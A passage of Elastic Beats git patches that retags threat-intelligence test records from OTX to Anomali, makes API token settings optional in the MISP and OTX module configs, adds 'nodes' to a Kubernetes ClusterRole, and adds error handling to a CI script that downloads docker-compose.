"forwarded" ], "threatintel.anomali.description": "TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", @@ -1439,7 +1439,7 @@ "log.offset": 24871, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55245868770; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime", @@ -1474,7 +1474,7 @@ "log.offset": 25529, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55245868769; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime", @@ -1509,7 +1509,7 @@ "log.offset": 26146, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55245868772; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", @@ -1544,7 +1544,7 @@ "log.offset": 26788, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55245868766; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", @@ -1578,7 +1578,7 @@ "log.offset": 27403, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", @@ -1613,7 +1613,7 @@ "log.offset": 28008, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55245868767; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", @@ -1648,7 +1648,7 @@ "log.offset": 28643, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55245868768; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", @@ -1683,7 +1683,7 @@ "log.offset": 29278, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078037; iType: mal_url; State: active; Source: CyberCrime", @@ -1718,7 +1718,7 @@ "log.offset": 29854, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime", @@ -1749,7 +1749,7 @@ "log.offset": 30419, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078019; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", @@ -1783,7 +1783,7 @@ "log.offset": 31024, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078035; iType: mal_url; State: active; Source: CyberCrime", @@ -1818,7 +1818,7 @@ "log.offset": 31656, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", @@ -1853,7 +1853,7 @@ "log.offset": 32244, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime", @@ -1888,7 +1888,7 @@ "log.offset": 32820, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078026; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", @@ -1922,7 +1922,7 @@ "log.offset": 33391, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078034; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime", @@ -1957,7 +1957,7 @@ "log.offset": 34081, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078032; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", @@ -1992,7 +1992,7 @@ "log.offset": 34720, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078031; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime", @@ -2027,7 +2027,7 @@ "log.offset": 35346, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078027; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime", @@ -2062,7 +2062,7 @@ "log.offset": 36034, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078013; iType: mal_url; State: active; Source: CyberCrime", @@ -2096,7 +2096,7 @@ "log.offset": 36604, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime", @@ -2130,7 +2130,7 @@ "log.offset": 37152, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078012; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", @@ -2164,7 +2164,7 @@ "log.offset": 37767, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078018; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", @@ -2198,7 +2198,7 @@ "log.offset": 38372, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime", @@ -2229,7 +2229,7 @@ "log.offset": 38925, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078010; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime", @@ -2264,7 +2264,7 @@ "log.offset": 39521, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", @@ -2295,7 +2295,7 @@ "log.offset": 40072, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078020; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", @@ -2329,7 +2329,7 @@ "log.offset": 40677, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", @@ -2364,7 +2364,7 @@ "log.offset": 41300, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", @@ -2398,7 +2398,7 @@ "log.offset": 41865, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078025; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", @@ -2432,7 +2432,7 @@ "log.offset": 42434, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime", @@ -2463,7 +2463,7 @@ "log.offset": 42960, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime", @@ -2494,7 +2494,7 @@ "log.offset": 43521, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078011; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime", @@ -2529,7 +2529,7 @@ "log.offset": 44126, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078015; iType: mal_url; State: active; Source: CyberCrime", @@ -2563,7 +2563,7 @@ "log.offset": 44700, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078029; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime", @@ -2598,7 +2598,7 @@ "log.offset": 45330, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078016; iType: mal_url; State: active; Source: CyberCrime", @@ -2632,7 +2632,7 @@ "log.offset": 45890, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078024; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime", @@ -2667,7 +2667,7 @@ "log.offset": 46491, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078022; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", @@ -2701,7 +2701,7 @@ "log.offset": 47096, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078021; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", @@ -2735,7 +2735,7 @@ "log.offset": 47701, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime", @@ -2766,7 +2766,7 @@ "log.offset": 48229, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime", @@ -2800,7 +2800,7 @@ "log.offset": 48824, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", @@ -2834,7 +2834,7 @@ "log.offset": 49397, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484356; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", @@ -2869,7 +2869,7 @@ "log.offset": 50023, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484343; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", @@ -2903,7 +2903,7 @@ "log.offset": 50638, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime", @@ -2938,7 +2938,7 @@ "log.offset": 51243, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484342; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", @@ -2972,7 +2972,7 @@ "log.offset": 51858, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484363; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", @@ -3007,7 +3007,7 @@ "log.offset": 52460, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484339; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime", @@ -3041,7 +3041,7 @@ "log.offset": 53022, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484351; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", @@ -3076,7 +3076,7 @@ "log.offset": 53740, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime", @@ -3110,7 +3110,7 @@ "log.offset": 54330, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484354; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime", @@ -3145,7 +3145,7 @@ "log.offset": 54924, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484362; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", @@ -3180,7 +3180,7 @@ "log.offset": 55526, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime", @@ -3214,7 +3214,7 @@ "log.offset": 56123, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484357; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", @@ -3249,7 +3249,7 @@ "log.offset": 56745, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484359; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", @@ -3284,7 +3284,7 @@ "log.offset": 57364, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484358; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", @@ -3319,7 +3319,7 @@ "log.offset": 57988, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484352; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime", @@ -3354,7 +3354,7 @@ "log.offset": 58627, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime", @@ -3385,7 +3385,7 @@ "log.offset": 59173, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55253484361; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", diff --git a/x-pack/filebeat/module/threatintel/misp/config/config.yml b/x-pack/filebeat/module/threatintel/misp/config/config.yml index 50f41e23b00e..c0700f6b4250 100644 --- a/x-pack/filebeat/module/threatintel/misp/config/config.yml +++ b/x-pack/filebeat/module/threatintel/misp/config/config.yml @@ -17,9 +17,11 @@ request.body: {{ range $key, $value := .filters}}{{$key}}: {{$value | tojson}}{{end}} {{end}} request.transforms: +{{ if .api_token }} - set: target: header.Authorization value: {{ .api_token }} +{{end}} - set: target: body.timestamp value: '[[.cursor.timestamp]]' diff --git a/x-pack/filebeat/module/threatintel/otx/config/config.yml b/x-pack/filebeat/module/threatintel/otx/config/config.yml index 7cb4b9368677..42af0a0c8e1b 100644 --- a/x-pack/filebeat/module/threatintel/otx/config/config.yml +++ b/x-pack/filebeat/module/threatintel/otx/config/config.yml @@ -13,12 +13,16 @@ request.transforms: - set: target: header.Content-Type value: application/json +{{ if .api_token }} - set: target: header.X-OTX-API-KEY value: {{ .api_token }} +{{ end }} +{{ if .types }} - set: target: url.params.types value: {{ .types }} +{{ end }} - set: target: url.params.modified_since value: '[[.cursor.timestamp]]' diff --git a/x-pack/filebeat/module/threatintel/otx/manifest.yml b/x-pack/filebeat/module/threatintel/otx/manifest.yml index 4c349d40fa0c..5bc84d42da3a 100644 --- a/x-pack/filebeat/module/threatintel/otx/manifest.yml +++ b/x-pack/filebeat/module/threatintel/otx/manifest.yml @@ -5,6 +5,8 @@ var: default: httpjson - name: interval default: 60m + - name: first_interval + default: 24h - name: api_token - name: ssl - name: types From 410d9000c57a36931c41f50d89dbfd6f100204d4 Mon Sep 17 00:00:00 2001 From: Jeff Spahr Date: Wed, 17 Feb 2021 02:41:02 -0500 Subject: [PATCH 62/63] Add nodes to filebeat-kubernetes.yaml ClusterRole - fixes #24051 (#24052) --- CHANGELOG.next.asciidoc | 1 + deploy/kubernetes/filebeat-kubernetes.yaml | 1 + deploy/kubernetes/filebeat/filebeat-role.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 6d94b576e15e..f2f64493d0f9 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -102,6 +102,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix parsing issues with nested JSON payloads in Elasticsearch audit log fileset. {pull}22975[22975] - Rename `network.direction` values in crowdstrike/falcon to `ingress`/`egress`. {pull}23041[23041] - Rename `s3` input to `aws-s3` input. {pull}23469[23469] +- Add `nodes` to filebeat-kubernetes.yaml ClusterRole. {issue}24051[24051] {pull}24052[24052] *Heartbeat* diff --git a/deploy/kubernetes/filebeat-kubernetes.yaml b/deploy/kubernetes/filebeat-kubernetes.yaml index 6c98c85f3d95..85e9717628d8 100644 --- a/deploy/kubernetes/filebeat-kubernetes.yaml +++ b/deploy/kubernetes/filebeat-kubernetes.yaml @@ -151,6 +151,7 @@ rules: resources: - namespaces - pods + - nodes verbs: - get - watch diff --git a/deploy/kubernetes/filebeat/filebeat-role.yaml b/deploy/kubernetes/filebeat/filebeat-role.yaml index 6bacfddfa43f..a30ab14574e4 100644 --- a/deploy/kubernetes/filebeat/filebeat-role.yaml +++ b/deploy/kubernetes/filebeat/filebeat-role.yaml @@ -9,6 +9,7 @@ rules: resources: - namespaces - pods + - nodes verbs: - get - watch From 465750c91d4ee476a1b2954c5bb7b81bea90ed58 Mon Sep 17 00:00:00 2001 From: Victor Martinez Date: Wed, 17 Feb 2021 09:45:55 +0000 Subject: [PATCH 63/63] [CI] install docker-compose with retry (#24069) --- .ci/scripts/install-docker-compose.sh | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/.ci/scripts/install-docker-compose.sh b/.ci/scripts/install-docker-compose.sh index 72d889f216af..bfc7ba17629a 100755 --- a/.ci/scripts/install-docker-compose.sh +++ b/.ci/scripts/install-docker-compose.sh @@ -23,5 +23,12 @@ DC_CMD="${HOME}/bin/docker-compose" mkdir -p "${HOME}/bin" -curl -sSLo "${DC_CMD}" "https://github.com/docker/compose/releases/download/${DOCKER_COMPOSE_VERSION}/docker-compose-$(uname -s)-$(uname -m)" -chmod +x "${DC_CMD}" +if curl -sSLo "${DC_CMD}" "https://github.com/docker/compose/releases/download/${DOCKER_COMPOSE_VERSION}/docker-compose-$(uname -s)-$(uname -m)" ; then + chmod +x "${DC_CMD}" +else + echo "Something bad with the download, let's delete the corrupted binary" + if [ -e "${DC_CMD}" ] ; then + rm "${DC_CMD}" + fi + exit 1 +fi